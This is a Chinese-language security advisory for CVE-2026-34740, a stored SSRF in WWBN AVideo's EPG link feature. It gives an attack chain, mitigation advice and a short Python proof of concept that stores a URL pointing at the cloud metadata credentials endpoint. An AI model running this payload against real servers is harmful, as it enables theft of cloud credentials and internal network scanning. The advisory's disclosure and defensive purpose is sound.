IPBUF安全漏洞报告
English
CVE-2026-34740 CVSS 6.5 中危

CVE-2026-34740 AVideo存储型SSRF漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34740
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

SSRFAVideo存储型漏洞内网扫描CVSS-6.5

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及之前版本中,其EPG(电子节目指南)链接功能存在存储型服务端请求伪造(SSRF)漏洞。拥有上传权限的经过身份验证的用户可以存储任意URL,服务器会在每次访问EPG页面时获取这些URL。由于仅使用PHP的FILTER_VALIDATE_URL进行验证(该过滤器接受内网地址)且未调用现有的isSSRFSafeURL()函数,攻击者可利用此漏洞扫描内部网络、访问云元数据服务并与之交互。目前尚无公开补丁。

技术细节

该漏洞位于AVideo平台的EPG链接功能模块。系统仅依赖PHP原生的`FILTER_VALIDATE_URL`函数来验证用户提交的URL。该函数虽然能验证URL格式的合法性,但并不区分内网地址(如`http://127.0.0.1`, `http://169.254.169.254`)与外网地址,导致攻击者可以输入内网资源地址。尽管AVideo代码库中存在名为`isSSRFSafeURL()`的安全函数专门用于防御SSRF攻击,但在处理EPG链接的代码路径中并未调用该函数。这使得具有上传权限的攻击者可以将恶意构造的内网URL存储在数据库中。当管理员或其他用户访问EPG页面时,服务器端应用会自动请求该恶意URL,从而将服务端的请求转发至内网目标。由于是存储型漏洞,攻击载荷持久化,可反复触发,导致内网端口扫描、敏感元数据泄露等风险。

攻击链分析

STEP 1
1. 身份认证
攻击者注册或获取一个具有上传权限的AVideo平台账号。
STEP 2
2. 构造恶意载荷
攻击者构造指向内网敏感资源(如127.0.0.1或云元数据服务IP)的URL。
STEP 3
3. 存储恶意URL
攻击者通过EPG链接功能提交该URL,由于缺少SSRF过滤,服务器将其保存至数据库。
STEP 4
4. 触发漏洞
当管理员或普通用户访问包含该恶意EPG链接的页面时,服务器端自动发起请求。
STEP 5
5. 获取信息
服务器将内网服务的响应返回(或在后台建立连接),攻击者据此扫描内网或窃取元数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Conceptual PoC for CVE-2026-34740 # Requires authentication and upload permissions target_host = "http://avideo-target.com" login_url = f"{target_host}/userLogin" epg_save_url = f"{target_host}/objects/epgLinkSave.json" # 1. Authenticate session = requests.Session() creds = {"user": "attacker", "pass": "password"} session.post(login_url, data=creds) # 2. Exploit SSRF by storing a malicious URL # Targeting internal metadata service (e.g., AWS) malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "url": malicious_url, "title": "Internal Scan" } response = session.post(epg_save_url, data=payload) if response.status_code == 200: print("[+] Malicious EPG link stored successfully.") print("[+] SSRF triggers when the EPG page is viewed by any user.") else: print("[-] Failed to store payload.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
由于目前暂无补丁,建议暂时禁用EPG(电子节目指南)功能或严格限制具有上传权限的用户数量。管理员应在防火墙或WAF层面实施出站流量过滤,禁止服务器访问RFC1918定义的内网地址(如10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)和链路本地地址(169.254.169.254),以防止云元数据窃取。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表